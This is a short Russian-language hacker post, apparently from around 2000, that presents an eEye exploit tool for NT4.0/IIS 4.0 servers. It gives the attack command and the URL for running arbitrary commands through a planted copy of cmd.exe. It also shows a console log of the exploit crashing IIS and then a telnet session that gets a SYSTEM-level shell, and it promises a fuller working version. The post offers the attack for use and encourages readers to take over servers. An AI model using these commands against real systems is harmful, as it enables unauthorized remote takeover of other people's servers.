Привет перцы!
Парни из команды Eeye снова подарили нам
чумовой експлойт на IIS4.0. Если target сервак
работает под NT4.0+IIS4.0+SP6a, то его можно поиметь
и, соответственно, порулить им. Сей exploit
довольно свеж, но это demo версия.
Атакуем :
iishack1.5.exe www.deadserver.com 80 2323
1. При атаке IIS умирает до перезапуска
сервака.
2. После атаки в каталоге scripts удаленного
сервера появляется два файла eeyehack.exe &
eeyerulez.asp, поясняю eeyehack.exe - это ничто иное как
переименованный cmd. Что это значит? Это
значит вперед и с песней...
www.deadserver.com/scripts/eeyehack.exe /c any_command_here
В реале это работает так...(не демо):
C:\>iishack1.5.exe www.i_love_this_game.com 80 6969
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.i_love_this_game.com on port 6969 and you should
get a cmd prompt.
C:\>telnet www.i_love_this_game.com 6969
Trying www.i_love_this_game.com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
Если тебе понравилось сие представление,
напиши мне, и в следующей статье я выложу
рабочую версию, которая дает долгожданный
шелл на любой порт ака ncx...